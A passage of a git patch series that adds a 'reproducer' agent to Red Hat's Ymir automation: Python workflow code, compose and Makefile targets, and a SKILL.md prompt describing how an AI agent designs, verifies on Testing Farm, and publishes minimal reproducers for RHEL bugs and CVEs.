JiraLabels, RedisQueues +from ymir.common.logging_setup import configure_logging +from ymir.common.mock_repos import get_mock_local_tool_env +from ymir.common.models import ( + ErrorData, + Task, +) +from ymir.common.models import ( + ReproducerInputSchema as InputSchema, +) +from ymir.common.models import ( + ReproducerOutputSchema as OutputSchema, +) +from ymir.tools.unprivileged.commands import RunShellCommandTool +from ymir.tools.unprivileged.text import CreateTool, SearchTextTool, ViewTool +from ymir.tools.unprivileged.version_mapper import VersionMapperTool + +logger = logging.getLogger(__file__) +redis_logger = logging.getLogger("agent.redis") + +_REPRODUCER_TERMINAL_LABELS = { + JiraLabels.REPRODUCER_CREATED.value, + JiraLabels.REPRODUCER_FAILED.value, + JiraLabels.REPRODUCER_ERRORED.value, + JiraLabels.REPRODUCER_NOT_REPRODUCIBLE.value, +} + +_PROMPT_TEMPLATE = "reproducer/prompt.j2" + + +# MCP tool names the reproducer agent needs access to +_REPRODUCER_MCP_TOOLS = [ + "get_jira_details", + "get_patch_from_url", + "get_maintainer_rules", + "clone_repository", + "fork_repository", + "push_to_remote_repository", + "open_merge_request", + "add_merge_request_labels", + "reserve_testing_farm_machine", + "get_testing_farm_reservation_details", + "cancel_testing_farm_request", + "run_remote_command", + "copy_files_to_remote", +] + + +class ReproducerState(BaseModel): + jira_issue: str + result: OutputSchema | None = Field(default=None) + + +def create_reproducer_agent(gateway_tools, local_tool_options=None, extra_middlewares=None) -> ReasoningAgent: + middlewares = [GlobalTrajectoryMiddleware(pretty=True)] + if extra_middlewares: + middlewares.extend(extra_middlewares) + return ReasoningAgent( + name="ReproducerAgent", + llm=get_chat_model(), + unconstrained=is_reasoning_enabled(), + tool_call_checker=get_tool_call_checker_config(), + tools=[ + ThinkTool(), + RunShellCommandTool(options=local_tool_options) if local_tool_options else RunShellCommandTool(), + VersionMapperTool(), + CreateTool(options=local_tool_options) if local_tool_options else CreateTool(), + ViewTool(options=local_tool_options) if local_tool_options else ViewTool(), + SearchTextTool(options=local_tool_options) if local_tool_options else SearchTextTool(), + ] + + [t for t in gateway_tools if t.name in _REPRODUCER_MCP_TOOLS], + memory=UnconstrainedMemory(), + requirements=[ + ConditionalRequirement( + ThinkTool, + force_at_step=1, + consecutive_allowed=False, + only_success_invocations=False, + ), + ConditionalRequirement("get_jira_details", min_invocations=1), + ConditionalRequirement("get_maintainer_rules", only_after=["get_jira_details"]), + ConditionalRequirement(RunShellCommandTool, only_after=["get_jira_details"]), + ConditionalRequirement("get_patch_from_url", only_after=["get_jira_details"]), + ConditionalRequirement("clone_repository", only_after=["get_jira_details"]), + ConditionalRequirement("reserve_testing_farm_machine", only_after=["get_jira_details"]), + ], + middlewares=middlewares, + role="Red Hat Enterprise Linux developer", + instructions=[ + "Do not perform root cause analysis or source code tracing — use the provided triage summary.", + "Always return the Testing Farm machine by calling cancel_testing_farm_request " + "when done, even if the reproducer failed.", + "When constructing patch URLs for upstream commits, always use https://. " + "If https:// fails when validating the patch with get_patch_from_url, " + "retry with http:// instead.", + "Never use shallow clones (--depth) when cloning upstream repositories.", + ], + ) + + +class _PromptContext(InputSchema): + """Combined context for SKILL.md template rendering. + + Extends the input schema with ``dry_run`` so the template can branch + on it. Defined at module level to avoid re-creating the class on every + ``_render_prompt`` call. + """ + + dry_run: bool = Field(default=False) + + +def _render_prompt(input_data: InputSchema, dry_run: bool = False) -> str: + """Render the reproducer prompt template with the input schema fields.""" + context = _PromptContext(**input_data.model_dump(), dry_run=dry_run) + return render_template(_PROMPT_TEMPLATE, context) + + +def _determine_result_label(result: OutputSchema) -> JiraLabels: + """Map reproducer output to the appropriate Jira label.""" + if result.success: + return JiraLabels.REPRODUCER_CREATED + if result.not_reproducible_reason: + return JiraLabels.REPRODUCER_NOT_REPRODUCIBLE + return JiraLabels.REPRODUCER_FAILED + + +async def run_workflow( + jira_issue: str, + dry_run: bool, + reproducer_agent_factory, + input_data: InputSchema | None = None, + user_triggered: bool = False, +): + local_tool_options = None + if mock_env := get_mock_local_tool_env(jira_issue): + local_tool_options = {"env": mock_env} + + async with mcp_tools(os.getenv("MCP_GATEWAY_URL"), call_meta={"jira_issue": jira_issue}) as gateway_tools: + tf_cleanup = TFReservationCleanupMiddleware() + reproducer_agent = reproducer_agent_factory( + gateway_tools, local_tool_options, extra_middlewares=[tf_cleanup] + ) + + workflow = Workflow(ReproducerState, name="ReproducerWorkflow") + + async def run_reproducer_analysis(state): + """Run the reproducer agent.""" + logger.info(f"Running reproducer analysis for {state.jira_issue}") + + agent_input = InputSchema(jira_issue=state.jira_issue) if input_data is None else input_data + + output_schema_json = to_json( + OutputSchema.model_json_schema(mode="validation"), + indent=2, + sort_keys=False, + ) + response = await reproducer_agent.run( + _render_prompt(agent_input, dry_run=dry_run), + expected_output=dedent( + f""" + The final answer must be a JSON object matching the ReproducerOutputSchema. + + **Important Formatting Rules:** + - The output must be a JSON object with the following keys: + `jira_issue`, `success`, `reproducer_type`, `test_mr_url`, + `testing_farm_request_id`, `pass_fail_criteria`, `summary`, + `not_reproducible_reason`. + - All string fields must be actual strings, not nested objects. + + **Example for a successful reproducer:** + ```json + {{{{ + "jira_issue": "RHEL-12345", + "success": true, + "reproducer_type": "cve", + "test_mr_url": "https://gitlab.com/redhat/rhel/tests/ksh/-/merge_requests/123", + "testing_farm_request_id": "tf-request-abc123", + "pass_fail_criteria": "PASS: program exits 0. FAIL: program crashes with SIGSEGV.", + "summary": "Created reproducer for CVE-2025-12345 in libfoo.", + "not_reproducible_reason": null + }}}} + ``` + + **Example for a non-reproducible result:** + ```json + {{{{ + "jira_issue": "RHEL-12345", + "success": false, + "reproducer_type": "bug", + "test_mr_url": null, + "testing_farm_request_id": "tf-request-xyz789", + "pass_fail_criteria": "PASS: command completes within 10s. FAIL: command hangs.", + "summary": "Investigated RHEL-12345 but could not reproduce the bug.", + "not_reproducible_reason": "Race condition requires specific timing." + }}}} + ``` + + ```json + {output_schema_json} + ``` + """ + ), + **get_agent_execution_config(), + ) + state.result = OutputSchema.model_validate_json(response.last_message.text) + + # Normalize jira_issue to upper-case + state.result.jira_issue = state.result.jira_issue.upper() + + return "handle_results" + + async def handle_results(state): + """Set Jira labels and post a comment based on the result.""" + result = state.result + logger.info( + f"Reproducer result for {state.jira_issue}: " + f"success={result.success}, type={result.reproducer_type}" + ) + + if dry_run: + logger.info(f"Dry run — skipping Jira updates for {state.jira_issue}") + return Workflow.END + + # Build a human-readable comment + comment_parts = [] + if result.success: + comment_parts.append("*Resolution*: reproduced") + elif result.not_reproducible_reason: + comment_parts.append("*Resolution*: not-reproducible") + else: + comment_parts.append("*Resolution*: error") + + comment_parts.append(f"*Reproducer Type*: {result.reproducer_type}") + + if result.testing_farm_request_id: + comment_parts.append(f"*Testing Farm Request*: {result.testing_farm_request_id}") + + if result.test_mr_url: + comment_parts.append(f"*Test MR*: {result.test_mr_url}") + + comment_parts.append(f"\n*Pass/Fail Criteria*:\n{result.pass_fail_criteria}") + comment_parts.append(f"\n*Summary*:\n{result.summary}") + + if result.not_reproducible_reason: + comment_parts.append( + f"\n*Not Reproducible Reason*:\n{result.not_reproducible_reason}" + ) + + comment_text = "\n".join(comment_parts) + + result_label = _determine_result_label(result) + await tasks.set_jira_labels( + jira_issue=state.jira_issue, + labels_to_add=[result_label.value], + labels_to_remove=[JiraLabels.REPRODUCER_IN_PROGRESS.value], + dry_run=dry_run, + user_triggered=user_triggered, + ) + + await tasks.comment_in_jira( + jira_issue=state.jira_issue, + agent_type="Reproducer", + comment_text=comment_text, + available_tools=gateway_tools, + user_triggered=user_triggered, + ) + return Workflow.END + + workflow.add_step("run_reproducer_analysis", run_reproducer_analysis) + workflow.add_step("handle_results", handle_results) + + try: + response = await workflow.run(ReproducerState(jira_issue=jira_issue)) + return response.state + finally: + await tf_cleanup.cleanup() + + +async def main() -> None: + init_sentry() + + configure_logging(level=logging.INFO) + resolve_chat_model_override("reproducer") + + span_processor = setup_observability(os.environ["COLLECTOR_ENDPOINT"]) + + dry_run = os.getenv("DRY_RUN", "False").lower() == "true" + + if jira_issue := os.getenv("JIRA_ISSUE", None): + logger.info("Running in direct mode with environment variable") + with span_processor.start_transaction(jira_issue, workflow="reproducer"): + agent_factory = build_agent_factory_with_mock_repos(create_reproducer_agent, jira_issue) + state = await run_workflow( + jira_issue, + dry_run, + agent_factory, + ) + logger.info(f"Direct run completed: {state.result.model_dump_json(indent=4)}") + return + + logger.info("Starting reproducer agent in queue mode") + async with redis_client(os.environ["REDIS_URL"]) as redis: + max_retries = int(os.getenv("MAX_RETRIES", 3)) + redis_logger.info(f"Connected to Redis, max retries set to {max_retries}") + + while True: + redis_logger.info("Waiting for tasks from reproducer_queue (timeout: 30s)...") + element = await fix_await( + redis.brpop( + [RedisQueues.REPRODUCER_QUEUE_TODO.value, RedisQueues.REPRODUCER_QUEUE.value], + timeout=30, + ) + ) + if element is None: + redis_logger.info("No tasks received, continuing to wait...") + continue + + _, payload = element + redis_logger.info("Received task from queue") + + task = Task.model_validate_json(payload) + input_data = InputSchema.model_validate(task.metadata) + user_triggered = task.user_triggered + logger.info( + f"Processing reproducer for JIRA issue: {input_data.jira_issue}, " + f"attempt: {task.attempts + 1}" + + (" (user-triggered)" if user_triggered else "") + ) + + # Duplicate-processing guard: skip if the issue already has a + # reproducer-terminal label and is not currently in-progress or + # user-triggered (which always gets a fresh run). + current_labels = await tasks.get_jira_labels(input_data.jira_issue) + terminal_ymir_labels = [ + label + for label in current_labels + if label in _REPRODUCER_TERMINAL_LABELS + ] + if ( + terminal_ymir_labels + and JiraLabels.REPRODUCER_IN_PROGRESS.value not in current_labels + and not user_triggered + ): + logger.info( + f"Skipping duplicate reproducer for {input_data.jira_issue} — " + f"already has labels: {terminal_ymir_labels}" + ) + continue + + async def retry(task, error, input_data=input_data, user_triggered=user_triggered): + task.attempts += 1 + if task.attempts < max_retries: + logger.warning( + f"Task failed (attempt {task.attempts}/{max_retries}), " + f"re-queuing for retry: {input_data.jira_issue}" + ) + retry_queue = ( + RedisQueues.REPRODUCER_QUEUE_TODO.value + if task.user_triggered + else RedisQueues.REPRODUCER_QUEUE.value + ) + await fix_await(redis.lpush(retry_queue, task.model_dump_json())) + else: + logger.error( + f"Task failed after {max_retries} attempts, " + f"moving to error list: {input_data.jira_issue}" + ) + try: + await tasks.set_jira_labels( + jira_issue=input_data.jira_issue, + labels_to_add=[JiraLabels.REPRODUCER_ERRORED.value], + labels_to_remove=[JiraLabels.REPRODUCER_IN_PROGRESS.value], + dry_run=dry_run, + user_triggered=user_triggered, + ) + except Exception as label_error: + logger.warning( + f"Failed to set error labels on {input_data.jira_issue}: {label_error}" + ) + await fix_await(redis.lpush(RedisQueues.ERROR_LIST.value, error)) + + # ymir_reproducer_in_progress is the dedup anchor for the next + # fetcher sweep. If we cannot write it, we must not proceed — + # otherwise the fetcher will re-enqueue this issue and a second + # reproducer will run in parallel. + try: + await tasks.set_jira_labels( + jira_issue=input_data.jira_issue, + labels_to_add=[JiraLabels.REPRODUCER_IN_PROGRESS.value], + labels_to_remove=[ + label + for label in JiraLabels.all_labels() + if label != JiraLabels.REPRODUCER_IN_PROGRESS.value + ], + dry_run=dry_run, + user_triggered=user_triggered, + critical=True, + ) + logger.info(f"Cleaned up existing labels for {input_data.jira_issue}") + # Post acknowledgement comment for user-triggered runs now that + # the in-progress label write succeeded. This prevents duplicate + # comments if the critical label write were to fail. + await tasks.post_user_ack_once( + task=task, + jira_issue=input_data.jira_issue, + agent_type="Reproducer", + comment_text=( + "Ymir picked up your request and started processing. " + "Results will be posted here when reproducer analysis completes." + ), + user_triggered=user_triggered, + dry_run=dry_run, + ) + except Exception as e: + logger.error( + f"Could not set {JiraLabels.REPRODUCER_IN_PROGRESS.value} on " + f"{input_data.jira_issue} after retries: {e}; re-queuing to avoid duplicate reproducer." + ) + error_msg = f"Failed to set in-progress label: {e}" + error_data = ErrorData(details=error_msg, jira_issue=input_data.jira_issue) + await retry(task, error_data.model_dump_json()) + # Long sleep on purpose: critical-write retries already burned + # ~7s, so we're past transient blips. Typical Jira outages last + # minutes; cycling faster just spams the API. + await asyncio.sleep(60) + continue + + try: + logger.info(f"Starting reproducer processing for {input_data.jira_issue}") + with span_processor.start_transaction( + input_data.jira_issue, workflow="reproducer" + ): + state = await run_workflow( + input_data.jira_issue, + dry_run, + create_reproducer_agent, + input_data=input_data, + user_triggered=user_triggered, + ) + output = state.result + logger.info( + f"Reproducer processing completed for {input_data.jira_issue}, " + f"success: {output.success}" + ) + + except Exception as e: + error = "".join(traceback.format_exception(e)) + logger.error( + f"Exception during reproducer processing for " + f"{input_data.jira_issue}: {error}" + ) + await retry( + task, + ErrorData( + details=error, jira_issue=input_data.jira_issue + ).model_dump_json(), + ) + else: + logger.info( + f"Reproducer resolved as success={output.success} " + f"for {input_data.jira_issue}" + ) + + # Push the completed result to the completed list + await fix_await( + redis.lpush( + RedisQueues.COMPLETED_REPRODUCER_LIST.value, + output.model_dump_json(), + ) + ) + logger.info( + f"Pushed {input_data.jira_issue} to " + f"{RedisQueues.COMPLETED_REPRODUCER_LIST.value}" + ) + + +if __name__ == "__main__": + try: + asyncio.run(main()) + except FrameworkError as e: + traceback.print_exc() + sys.exit(e.explain()) From e93edb388930e5a8179050fd99abc77efeb2e9dd Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:57:25 +0200 Subject: [PATCH 14/16] Add reproducer agent deployment configuration - compose.yaml: Add reproducer-agent service definition with MCP gateway dependency, Jira/TF environment variables, and volume mounts for git repos and prompt templates - Makefile: Add reproducer-related targets (run, test, lint) - .gitignore: Exclude secrets directory and agent runtime artifacts - templates/beeai-agent.env: Add REPRODUCER_QUEUE variable Co-Authored-By: Claude Opus 4.6 --- .gitignore | 2 ++ Makefile | 16 ++++++++++++++++ compose.yaml | 20 ++++++++++++++++++++ templates/beeai-agent.env | 1 + 4 files changed, 39 insertions(+) diff --git a/.gitignore b/.gitignore index 32cce219..487c7e76 100644 --- a/.gitignore +++ b/.gitignore @@ -54,8 +54,10 @@ ymir/agents/tests/e2e/mock_repos/* !ymir/agents/tests/e2e/mock_repos/README.md !ymir/agents/tests/e2e/mock_repos/triage/ !ymir/agents/tests/e2e/mock_repos/backport/ +!ymir/agents/tests/e2e/mock_repos/reproducer/ ymir/agents/tests/e2e/mock_repos/triage/* ymir/agents/tests/e2e/mock_repos/backport/* +ymir/agents/tests/e2e/mock_repos/reproducer/* # E2E test output artifacts ymir/agents/tests/e2e/test_output/ diff --git a/Makefile b/Makefile index a91f4a22..42f8b73e 100644 --- a/Makefile +++ b/Makefile @@ -62,6 +62,22 @@ run-backport-agent-e2e-tests: backport-agent-e2e-tests +.PHONY: run-reproducer-agent-e2e-tests +run-reproducer-agent-e2e-tests: + $(COMPOSE) -f $(COMPOSE_FILE) --profile=e2e-test run --rm \ + -e MOCK_JIRA="true" \ + -e DRY_RUN="true" \ + reproducer-agent-e2e-tests + +.PHONY: run-reproducer-agent-standalone +run-reproducer-agent-standalone: + $(COMPOSE_AGENTS) run --rm \ + -e JIRA_ISSUE=$(JIRA_ISSUE) \ + -e DRY_RUN=$(DRY_RUN) \ + -e MOCK_JIRA=$(MOCK_JIRA) \ + -e JIRA_DRY_RUN=$(JIRA_DRY_RUN) \ + reproducer-agent + .PHONY: run-rebase-agent-c9s-standalone run-rebase-agent-c9s-standalone: $(COMPOSE_AGENTS) run --rm \ diff --git a/compose.yaml b/compose.yaml index 27e2c305..cb57402f 100644 --- a/compose.yaml +++ b/compose.yaml @@ -230,6 +230,26 @@ services: restart: "no" profiles: ["e2e-test"] + reproducer-agent-e2e-tests: + <<: *beeai-agent-c10s + environment: + <<: *beeai-env + REPRODUCER_MOCK_REPOS_DIR: /home/beeai/mock_repos/reproducer + volumes: + - ./ymir:/home/beeai/ymir:ro,z + - git-repos:/git-repos:rw,U + - .secrets/rhel-config.json:/home/beeai/rhel-config.json:ro,z,U + - .secrets/jotnar-vertex-dev.json:/home/beeai/jotnar-vertex-dev.json:ro,z,U + - ${MOCK_REPOS_HOST:-./ymir/agents/tests/e2e/mock_repos}:/home/beeai/mock_repos:ro,z + command: ["pytest", "ymir/agents/tests/e2e/reproducer_agent/test_reproducer.py", "-o", "asyncio_default_test_loop_scope=session"] + restart: "no" + profiles: ["e2e-test"] + + reproducer-agent: + <<: *beeai-agent-c10s + command: ["python", "-m", "ymir.agents.reproducer_agent"] + profiles: ["agents"] + backport-agent-c9s: <<: *beeai-agent-c9s command: ["python", "-m", "ymir.agents.backport_agent"] diff --git a/templates/beeai-agent.env b/templates/beeai-agent.env index 8650ba19..a8bf24af 100644 --- a/templates/beeai-agent.env +++ b/templates/beeai-agent.env @@ -27,6 +27,7 @@ CHAT_MODEL= # CHAT_MODEL_BACKPORT= # CHAT_MODEL_REBASE= # CHAT_MODEL_REBUILD= +# CHAT_MODEL_REPRODUCER= # One of: none, minimal, low, medium, high; defaults to none REASONING_EFFORT=high From f74052af73f56f8b50b11f451b8712dacc6ca734 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:57:29 +0200 Subject: [PATCH 15/16] Add reproducer agent skill definition SKILL.md that registers the reproducer as a Claude Code slash-command skill. Defines the input schema (Jira issue key), required environment variables, and invocation instructions for running the reproducer through the Claude Code CLI. Co-Authored-By: Claude Opus 4.6 --- agents_as_skills/reproducer/SKILL.md | 722 +++++++++++++++++++++++++++ 1 file changed, 722 insertions(+) create mode 100644 agents_as_skills/reproducer/SKILL.md diff --git a/agents_as_skills/reproducer/SKILL.md b/agents_as_skills/reproducer/SKILL.md new file mode 100644 index 00000000..9958157d --- /dev/null +++ b/agents_as_skills/reproducer/SKILL.md @@ -0,0 +1,722 @@ +--- +name: reproducer +description: Create minimal, automated reproducers for RHEL bugs and CVEs — design tests, verify on Testing Farm machines, and publish merge requests to the RHEL tests repository. +--- + +# Reproducer Skill + +You are a Red Hat Enterprise Linux developer tasked with creating a minimal, automated reproducer for a bug or CVE described in a Jira issue. Your goal is to create a test that objectively demonstrates the bug, verify it on a real RHEL system via Testing Farm, and publish the result. + +You receive your understanding of the bug from the inputs: the Jira issue description, `triage_summary`, `patch_urls`, and `cve_id`. Do NOT perform root cause analysis, source code tracing, or upstream fix hunting. Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Input Arguments + +- `jira_issue`: {{jira_issue}} +- `package`: {{package}} +- `cve_id`: {{cve_id}} +- `patch_urls`: {{patch_urls}} +- `triage_summary`: {{triage_summary}} +- `fix_version`: {{fix_version}} +- `target_branch`: {{target_branch}} +- `dry_run`: {{dry_run}} + +## Tools + +This skill uses the following tools. Do not restrict tool usage — use any tool available as needed. + +**MCP Tools (called via MCP gateway):** +- `get_jira_details` — Get full details of a JIRA issue (fields, comments, links) +- `get_patch_from_url` — Fetch patch/commit content from a URL and return the raw diff (used to read `patch_urls` provided by the caller, NOT for searching for new patches) +- `get_maintainer_rules` — Get maintainer-specific rules and guidelines for a package +- `clone_repository` — Clone a Git repository to a local path +- `fork_repository` — Fork a Git repository (used for MR creation) +- `push_to_remote_repository` — Push a branch to a remote repository +- `open_merge_request` — Open a merge request from a fork against its original repository +- `add_merge_request_labels` — Add labels to a merge request +- `reserve_testing_farm_machine` — Reserve a Testing Farm machine with SSH access +- `get_testing_farm_reservation_details` — Get status and SSH details of a TF reservation +- `cancel_testing_farm_request` — Cancel/release a Testing Farm reservation +- `run_remote_command` — Execute a command on a remote machine via SSH +- `copy_files_to_remote` — Copy files to a remote machine via SCP + +**Local Tools (filesystem, git, analysis):** +- `map_version` — Map RHEL major version to current Y-stream and Z-stream versions. Input: `major_version` (integer, e.g. 9 or 10). Returns `y_stream`, `z_stream`, and `is_maintenance_version`. +- `run_shell_command` — Execute shell commands (git operations, searching) +- `view` — View file or directory contents +- `search_text` — Search for text patterns in files +- `create` — Create new files + +**Other:** +- Bash tool for shell commands (e.g., `git log`, `grep`) + +## Critical Rules + +- **NEVER use direct `git clone` commands.** Always use the `clone_repository` MCP tool for cloning repositories. +- **Do NOT perform root cause analysis, source code tracing, or upstream fix hunting.** Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Reproducer Design Principles + +Every reproducer created by this agent must follow these principles: + +1. **Minimal**: The smallest script that still hits the same code path. Drop unrelated environment setup, users, networks, and configuration. If the bug can be triggered with a three-line input file, do not use a fifty-line one. + +2. **Non-interactive**: Shell script (`.sh`, `.ksh`), one-liner file, or documented `shell -c '...'`. No prompts, no user interaction, no GUI dependencies. + +3. **Heavy setups**: If the bug requires a VM, network topology, or multi-service environment, try to simulate the same failure with a local file, small input, or reduced command sequence first. If that is impossible, state "reproducer blocked" and document what is missing. + +4. **Objective pass/fail**: The reproducer must have a machine-readable pass/fail criterion. Acceptable methods include: + - Exit code (0 = PASS, non-zero = FAIL) + - Exact string match or empty capture vs expected output + - Valgrind: `LEAK SUMMARY` lines with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` so the process exits non-zero on leaks + - Timeout vs hang (document the timeout value explicitly) + - Signal-based detection (e.g., SIGSEGV, SIGABRT for crash bugs) + +5. **Automation-ready**: The reproducer must work with `git bisect run` and CI pipelines. No hardcoded paths, no assumptions about the user's environment beyond the target RHEL version. + +## Workflow + +Execute the following steps in order. Track state across steps using these variables: + +- `package_name` — the RPM package name (null initially) +- `maintainer_rules` — package-specific rules from maintainer (null initially) +- `jira_data` — full Jira issue data (null initially) +- `tf_request_id` — Testing Farm reservation request ID (null initially) +- `ssh_connection` — SSH connection string for the reserved machine, e.g. `root@1.2.3.4` (null initially) +- `test_dir` — local path to the test directory created in the tests repo clone (null initially) +- `tests_clone` — path to cloned `gitlab.com/redhat/rhel/tests/` repository (null initially) +- `reproducer_verified` — whether the reproducer was successfully verified on TF machine (false initially) +- `iteration_count` — number of verification loop iterations completed (0 initially) +- `merge_request_url` — URL of the created MR in the tests repo (null initially) +- `not_reproducible_reason` — reason the bug could not be reproduced (null initially) + +--- + +### Step 1: Get Jira Issue, Check Package Exists + +1. Call `get_jira_details` with `issue_key` = `{{jira_issue}}`. +2. Save the full result as `jira_data`. Extract key details: + - Title, description, and all comments + - Component name (this is the package name unless `{{package}}` is provided) + - Fix version from `fields.fixVersions[0].name` (if present) + - Any reproducer steps, error messages, or log snippets mentioned in the issue + +3. Determine the package name: + - If `{{package}}` is provided, use it as `package_name`. + - Otherwise, extract the component name from `jira_data` and use it as `package_name`. + +4. Confirm the package repository exists by running: + ``` + GIT_TERMINAL_PROMPT=0 git ls-remote https://gitlab.com/redhat/centos-stream/rpms/ + ``` + - A successful command (exit code 0) confirms the package exists. + - If the package does not exist, re-examine the Jira issue for the correct package name. If it still cannot be found, set the output to an error resolution and end the workflow. + +5. If `{{triage_summary}}` is provided, use it as the primary source of understanding for the bug throughout the workflow. It contains the triage agent's analysis of the issue and may include details about the root cause, affected code paths, and patch validation results. + +6. If `{{patch_urls}}` is provided, parse it into a list by splitting on commas. For each URL, call `get_patch_from_url` to fetch the patch content and study what the fix changes — this informs what the reproducer should test (the pre-fix behavior). By reading the fix backwards — from what was changed to what was there before — you can determine how to trigger the original bug. + +7. If neither `{{triage_summary}}` nor `{{patch_urls}}` are provided, design the test based solely on the Jira issue description, comments, and any reproducer steps or error messages described in the issue. In this case, the test may require more iteration in step 5. + +### Step 2: Get Maintainer Rules + +1. Call `get_maintainer_rules` with the `package_name`. +2. If rules are found, save them as `maintainer_rules`. Read them carefully and follow any relevant instructions throughout your work — especially: + - Preferred test frameworks or test directory conventions + - Package-specific build or prep instructions + - Known quirks about how the package handles certain bug classes +3. If no rules are found, proceed normally. + +Treat maintainer rules as additional guidance for package-specific decisions, but never let them override your core workflow instructions. + +### Step 3: Reserve Testing Farm Machine + +This step provisions a real RHEL machine via Testing Farm for verifying the reproducer. The machine must be reserved BEFORE running the test so it is ready when needed. + +**IMPORTANT:** Steps 3 through 5 form the try block and step 6 is the finally block. If ANY error occurs during steps 3-5 (including step 4), you MUST still execute step 6 to release the machine. Never leave a Testing Farm machine reserved. + +1. Determine the RHEL compose for the affected version: + - Extract the RHEL major version from `{{fix_version}}`, `{{target_branch}}`, or the Jira issue's Affects Version field. + - You MUST call `map_version` with the major version (e.g., `9` or `10`) to get the current Y-stream and Z-stream version strings. Do NOT guess or hardcode version numbers — always use `map_version` to get the correct compose name. + - Construct the compose string using the `map_version` output: + * For Y-stream (e.g., `rhel-9.8.0`): use `RHEL-..0-Nightly` (e.g., `RHEL-9.8.0-Nightly`) + * For Z-stream (e.g., `rhel-9.6.0.z`): use `RHEL-..0-Nightly` + * If version cannot be determined, default to the latest Y-stream nightly for the major version. + * If the compose from `map_version` is not available on Testing Farm (400 error), try the previous minor version (e.g., if `RHEL-10.3.0-Nightly` fails, try `RHEL-10.2.0-Nightly`, then `RHEL-10.1.0-Nightly`). Stop at minor version 0 — do not cross major version boundaries. + +2. Determine the architecture: + - Default to `x86_64`. + - If the Jira issue specifies a different architecture (e.g., `aarch64`, `ppc64le`, `s390x`), use that instead. + +3. Call `reserve_testing_farm_machine` with: + - `compose`: the compose string from above (e.g., `RHEL-9.8.0-Nightly`) + - `arch`: the target architecture (default: `x86_64`) + - `duration_minutes`: `60` (default; increase to 120 for complex tests) + - `ssh_public_key`: omit this parameter — the gateway uses its own SSH key automatically. + - Save the returned `id` field as `tf_request_id`. + +4. Wait for the machine to become available: + - Call `get_testing_farm_reservation_details` with `request_id` = `tf_request_id`. + - This tool polls internally for up to 10 minutes — do NOT add your own polling loop or sleep around it. + - You MUST call this tool EXACTLY ONCE. Never call it a second time. The tool already retries internally. + - Check the result: + * If `ssh_connection` is present and is NOT `"not-yet-available"`: the machine is ready. Save `ssh_connection`. + * If `state` is `"error"`, `"canceled"`, or `ssh_connection` is `"not-yet-available"`: the reservation failed or timed out. You MUST immediately jump to step 6 (cancel the reservation) and then report the error. Do NOT continue to step 4 or step 5. Do NOT retry `get_testing_farm_reservation_details`. + +5. Verify SSH connectivity: + - Call `run_remote_command` with `ssh_host` = `ssh_connection` and `command` = `"cat /etc/redhat-release"`. + - Confirm the machine is running the expected RHEL version. + - If SSH connection fails, retry once after 15 seconds (the machine may still be booting). + +### Step 4: Create tmt Test Structure Locally + +This step creates the tmt-compatible test directory structure locally. The test files will later be copied to the Testing Farm machine for verification (step 5) and committed to the tests repo for the MR (step 7). + +Use the Jira issue description, `triage_summary`, and `patch_urls` to understand the bug and design the test. The patch URLs show what the fix changes — by reading the fix you can determine what behavior to test (the pre-fix, buggy behavior). + +#### 4.1. Clone the Tests Repository + +1. Clone the RHEL tests repository using `clone_repository`: + - URL: `https://gitlab.com/redhat/rhel/tests/` + - Do NOT specify a `branch` parameter — omit it so the tool clones the default branch (it may not be `main`). + - Use a clone path under `/git-repos/` (the shared volume), e.g. `/git-repos/tests-`. + - If the clone path already exists from a previous failed attempt, delete it first with `run_shell_command("rm -rf /git-repos/tests-")` before retrying. + - Save the clone path as `tests_clone`. + +2. Create the test directory: + - For CVEs: `/Security//` + - For bugs (non-CVE): `/Regression//` + - Save the directory path as `test_dir`. + +3. Create the `.fmf/version` file if it does not already exist at the tests repo root: + ``` + mkdir -p /.fmf + echo "1" > /.fmf/version + ``` + +#### 4.2. Create `ai-test-description` + +Create `/ai-test-description` with the following content structure: + +``` +=== Issue Information === +Issue: +Type: + +CVE: + +Package: +Component: +Affected Version: + +=== Analysis === + + + +Fix patches: + + +=== Test Methodology === + + +=== Expected Results === +PASS: +FAIL: + +=== References === + + +``` + +#### 4.3. Create Standalone Test Scripts (`test_*`) + +Based on the bug description from the Jira issue, `triage_summary`, and `patch_urls`, create one or more standalone test scripts. These are the actual programs/scripts that exercise the bug. + +Choose the language based on the package type: +- **C/C++ libraries** (e.g., `libxml2`, `openssl`, `glibc`): write a C program (`test_.c` or `test_.c`) that calls the vulnerable function with crafted input +- **Python packages** (e.g., `python-pillow`, `python-cryptography`): write a Python script (`test_.py`) +- **CLI tools** (e.g., `curl`, `binutils`, `grep`): write a shell script (`test_.sh`) that invokes the tool with triggering arguments +- **Libraries with bindings**: prefer the language closest to the vulnerability (C for a C library even if Python bindings exist) + +Each test script must: +- Be self-contained — no dependencies beyond the package under test and standard system tools +- Accept no interactive input +- Exit with a clear pass/fail signal using an appropriate detection method (see section 4.3.1 below) + +If the test needs crafted input files (malformed images, certificates, config files, etc.), create them as separate files in `test_dir` or generate them inline in the test script. Prefer generating them inline when possible to keep the test self-contained. + +**CRITICAL:** Write standalone test scripts, NOT inline heredocs in `runtest.sh`. The `runtest.sh` BeakerLib harness copies and runs these scripts; it does not contain the test logic itself. + +##### 4.3.1. Choosing the Detection Method + +Based on the bug type (inferred from the Jira issue description and triage summary), choose the appropriate pass/fail approach for your test scripts: + +1. **Crash bugs** (null pointer dereference, buffer overflow, use-after-free): + - Detection: process exits with signal (SIGSEGV, SIGABRT, SIGBUS) + - Method: run the program and check exit code; non-zero or signal = bug present + - Enhancement: use AddressSanitizer (`ASAN_OPTIONS`), Valgrind, or `GLIBC_TUNABLES=glibc.malloc.check=3` (for glibc 2.34+) to make detection more reliable + +2. **Memory leak bugs**: + - Detection: Valgrind `LEAK SUMMARY` with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` + - Alternative: pmap RSS growth over repeated runs (document which method is authoritative) + +3. **Logic bugs** (wrong output, incorrect behavior): + - Detection: compare program output against expected output + - Method: exact string match, diff, or specific pattern in output + +4. **Hang / infinite loop bugs**: + - Detection: process does not terminate within a timeout + - Method: `timeout s ` and check exit code 124 (timeout) + +5. **Information disclosure bugs**: + - Detection: program outputs data it should not + - Method: check for presence of sensitive data in output + +6. **Denial of service bugs** (excessive resource consumption): + - Detection: resource usage exceeds threshold + - Method: measure CPU 